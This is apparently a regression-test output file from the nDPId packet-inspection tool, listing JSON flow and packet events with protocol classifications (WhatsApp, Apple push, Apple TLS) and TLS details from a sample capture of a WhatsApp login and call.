+00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582227604,"flow_last_seen":1432582227896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1432582227896,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432582228152,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228152,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0UDkAAO4GQB4RsmgOwKgCBAG7wDON4auhp3wzpIASH\/48GwAAAgQFoAEDAwQBAQQC"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1432582228167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582228167,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoC8AAAEAGMqTAqAIEEbJoDsAzAbunfDOkAAAAAFAEAADWZAAA"} +01291{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1432582227604,"flow_last_seen":1432582228181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3601,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1432582228181,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"query.ess.apple.com","server_names":"*.ess.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"CN=Apple Server Authentication CA, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=*.ess.apple.com, OU=ISG Delivery Ops, O=Apple Inc., C=US","fingerprint":"BD:E0:62:C3:F2:9D:09:5D:52:D4:AA:60:11:1B:36:1B:03:24:F1:9B"}} +00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1432582228503,"pkt":"xiwDYGpkAPS5Jrv0CABFAAXUnXJAAEAG3ojAqAIEEW7lDsApFGe4aEuG1IsaTIAQIAA3PgAAAQEICi36MxJvhmvfFwMBACDgnfLWgV8g\/pw7jjX\/\/3ZDH1tB+gK1jE9k\/rmu6RmKPhcDAQdQwvKiQZwynx6ML8uHDg8WgbZIBNPdSiBPAiHm7VZMSxjHJ7BGJ8hRCNCOXC6LyliytHBkvL\/WQAE0iyMMgIlOMed9vHW1FQrPwtxifubqT35jWP9Nwm9hOQ2sUXPF6J6ZcqeRRxjts4LAxUp+ZVHbqO88UycvtArFRoKmsjwuTsOHFL0h\/BX9z3nWEUxaS9mVyhudzOuBlhf3aNgcppeJ3Mr6DsSPYDWrJ1Ko6GUQ6Mz7WhKyRp+OhCR+8vNcJ+2CIpa9aPiStGZvZFFuJ5eoJiBK6lrgPDyxxPa\/Z82Zx7iZHY+\/ajmPTXvQU4j7rC5OlL\/ZO1JkHVVmXmK1\/n5cUDYPvmxuWKEEWDx8eNxgRC58OMj0i5sHQHDG+ZLwIW4R3Ebyfp++7DjTwhy7uHM9lVzOAa6qgVVbeWZWLm5Zp4udgSHyIGs6plbNOhN8Lb7TTV3BFKBjCbwxtnCR+8lPTlOVAewtoM48Z0qRSJODl9LDmyJOnkTl+LQlbM7hWhZq\/VVyYDivHB+RnYZFdt7ZvWbMsFi9dXD6LjMsdLkj0RU\/SFA5gXvUGWy9x04Yo\/WqRH7ng0WIs\/oAxdVKAH0RL\/egfgAwRrcRgu3dPMqb8b19+PmNfa+WFGFnW0JLuexKCM9POmeD5yw6nk\/ac9Raq2rKcykqXxndrastmOjTbplC4qeRqr0LASV9tRAtG4WvYwC\/dfTiBawq859mBNGrglJvult9KPMKQPFULDG6x+KBv4eYpxjRc54qoabZQMWqqc+\/C0Emvy+eYJXsquvu+83ilyZ2N5sYlJ92HKH8JfE8JTIg5o3c9zLm5ZWhw8+NmQMwd0i5bU9vg06cROWuAG\/JN1YaR0pdUTITubm5mlduwzPQc2BVmXII2GZu105+s7qlJpQzMmRVjoqYtbOeWHJKIQ4UQdZCqzpz4AcWUN7LNHzsfvI5B8mXgc+B7aL8Y8jc2YqBmFk1dHfnjKeYCxGmRBZHJy7WbY9uViabjXvTq6pmYIGh+8lsYGwBwhWNapwWuc8Bw0b65ZKVGVcMKolOabscbWi+EYPJjuvFKgqZscrMC1dXZUtfdGPsPdXUlxbBMQ2Kup7KMqRXjqDlL2rJPpRC\/J6FfjQ+IKNfM\/RVAKV8teQWPRPthAH1FIrtEy51cDQixMgza8uftMRBKRfqEYXF7XVD5164o\/Mck2RudrQlyQmifMkcXuuW1kb2sTQoTz3p0Ox09YvEjxH+5SXf2MqAQ5cwiqd8fGHwSVuprE4y5B+B+0nEsRucTP\/97X6ZaOAcSRCuPQgdHN1NHCSQ8002IEFsPCRXQaWhb\/8KMjfJXXs1I3Eouoy5fGg9Eon7zV6InzJDOtmcVxRzUBgfDR1DGBIMOusKSnnAX1htfNBhCsM31KRySVA9BnU7p8tKS\/3BfJCTQQBoGTP2MoOxAiFKkSgXEh3w0kC\/x4kpimxmzxtGXOOQBZWNBgxyNTYgb0Sf9nOE+sqmGbSG7xueIM5u7Dd864xcMPmVsE1VcOkz2PMHbXIHe+roLyX2aqyb6Yu22cChJiPbSlY+mRr9siD+E7u3KnznXJcpEJBSd3utMm4QryOQBR9FCdalU2IyjVmAb148IpK6Ghgjmw7oVrHdCZXaVw+zfL1FhqC9Bd1VFHiBGm211UlGgrjedJW7mv5NM2z0cPLUMCaZycFw6G4KQN6aDAE1rL1eqhrIxxsuhCw0HsrKiJLLdGsa1+3Rf\/uEKt1c0Ng9dAzkrCJEwEwHx3trkLyhj9\/ja7mEqYBSp5Sx0mCtwBbfi6wnI8gTgb3WlgH0Ha3ke8bRCbeKw4dCUR0GSPUQYm4lO6VKKERImy3aoUDOHbtquSKZKUtb1hVt"} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582228503,"flow_last_seen":1432582228503,"flow_idle_time":7560000,"flow_min_l4_payload_len":1440,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1440,"flow_avg_l4_payload_len":1440,"midstream":1,"thread_ts_msec":1432582228503,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1432582228504,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":540,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":540,"pkt_l4_len":506,"thread_ts_msec":1432582228504,"pkt":"xiwDYGpkAPS5Jrv0CABFAAIO1F9AAEAGq2HAqAIEEW7lDsApFGe4aFEm1IsaTIAYIACssAAAAQEICi36MxJvhmvfY2JtdD6CZ3s26zaizYDBa1\/xV9+nfluOxtxa1tx195Jafsz52yXEOESrPvfo4L8JAAp0DYIaansHyOlB83T10iMEgMWpntVaGhVYz7Ui4c09FkbWN9q+65\/aqUq4TUrgzMyqE5QUWhXZSc\/uGC0icKHu+b2FL4NHGUs7nYDs8Xc0v0flHk5486jecRIc\/ROiqHyACG3C0wwDLYD5dPHsc+oO3YTdMQHp\/Y5aWShkoF9bF0dA6YegCOYLbVQKFU7DAdWxqhRRjje8xXf+tC7iVD+agcMxzHZHBdPvzUlsa6Hnp2KvOrzs9LBI3\/AlWnTDSOZNp+mWgK4MB2zxE5cEBsbimybYF8snsRtPtIBkMUfF1XAd9wg4sSCboXV1ik63xPuzTMdOxIRWWE26PTSksHKRu47JqvdF18Y85LvvQvIIft9jAMxZNM1JpDNK3xHTwcbI8OJ5ZzkwaDArtx1Yo+du+Za4kNeW1j1f7jlL58\/xs\/9pH231BKAPZrpjtiVLnSRVafACBd5M5lgbO1u\/aSBlmIQ\/UK6DM\/jen1DGM+xWiz3ABAYXKSpL6XfsJZ+dpwtcFktAw18x3fF8GSC0\/zgV+SA55WfIkN+qTLtYiq6ct7jHTceCT8cS"} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1432582227643,"flow_last_seen":1432582228593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1432582228593,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432582228753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582228753,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0JuMAAC8Gq7gRbuUOwKgCBBRnwCnUixpMuGhRJoAQAQ6R7QAAAQEICm+GjQ4t+jMS"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582230648,"flow_last_seen":1432582230648,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432582230648,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1432582230648,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1432582230648,"pkt":"xiwDYGpkAPS5Jrv0CABFAABAZppAAEAGvV7AqAIEEa1CZsA0AbuMr4Y\/AAAAALAC\/\/\/iDQAAAgQFtAEDAwQBAQgKLfo7WAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432582230787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582230787,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0jEsAAO8GKLkRrUJmwKgCBAG7wDR81DyUjK+GQIASH\/6qEgAAAgQFoAEDAwQBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1432582230854,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582230854,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLotAAEAG9YXAqAIEEa1CZsA0AbuMr4ZAfNQ8lVAQQADKywAA"} +00991{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432582230648,"flow_last_seen":1432582230862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1432582230862,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":148,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1432582230648,"flow_last_seen":1432582231003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1432582231003,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.AppleStore","breed":"Safe","category":"SoftwareUpdate"},"tls": {"version":"TLSv1.2","client_requested_server_name":"p53-buy.itunes.apple.com","ja3":"799135475da362592a4be9199d258726","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233314,"flow_last_seen":1432582233314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233314,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"93.186.135.8","src_port":49192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1432582233314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233314,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0kh5AAEAGATfAqAIEXbqHCMAoAFBgmxszxhyTY4ARIABAdgAAAQEICi36RbdjLQIx"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1432582233380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233380,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewoAADkGX0tduocIwKgCBABQwCjGHJNjYJsbNIAQAebnbwAAAQEICmMteVEt+kW3"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432582233490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582233490,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0ewsAADkGX0pduocIwKgCBABQwCjGHJNjYJsbNIARAebnAQAAAQEICmMteb4t+kW3"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582233751,"flow_last_seen":1432582233751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582233751,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.49","src_port":49191,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1432582233751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233751,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoI\/dAAEAG3k\/AqAIEEaxkMcAnAbsMJFozPw\/LbVAR\/\/9EkwAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1432582233884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233884,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo+xIAAO8GmDMRrGQxwKgCBAG7wCc\/D8ttDCRaNFARn\/6kkwAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432582233926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582233926,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoy8lAAEAGNn3AqAIEEaxkMcAnAbsMJFo0Pw\/LblAQ\/\/9EkgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582234869,"flow_last_seen":1432582234869,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582234869,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.52","src_port":49182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1432582234869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582234869,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAohHZAAEAGfc3AqAIEEaxkNMAeAbsiAVkzu7svv1AR\/\/9OvgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432582235010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235010,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoaq4AAO4GKZURrGQ0wKgCBAG7wB67uy+\/IgFZNFARn\/6uvgAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1432582235028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235028,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAosCtAAEAGUhjAqAIEEaxkNMAeAbsiAVk0u7svwFAQ\/\/9OvQAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235998,"flow_last_seen":1432582235998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235998,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1432582235998,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235998,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLkpAAEAG1AjAqAIEEaxkJcAdAbtiYuGVG2ODH1AR\/\/\/TAgAA"} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582235999,"flow_last_seen":1432582235999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582235999,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1432582235999,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582235999,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoEt9AAEAG713AqAIEEaxkO8AcAbueodpQe0gK3VAR\/\/+2UAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432582236140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236140,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoyysAAO8GyCYRrGQlwKgCBAG7wB0bY4MfYmLhllARn\/4zAwAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432582236144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236144,"pkt":"APS5Jrv0xiwDYGpkCABFAAAoKcoAAO4GanIRrGQ7wKgCBAG7wBx7SArdnqHaUVARn\/4WUQAA"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoLwpAAEAG00jAqAIEEaxkJcAdAbtiYuGWG2ODIFAQ\/\/\/TAQAA"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1432582236282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582236282,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoODNAAEAGygnAqAIEEaxkO8AcAbueodpRe0gK3lAQ\/\/+2TwAA"} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582238790,"flow_last_seen":1432582238790,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1432582238790,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 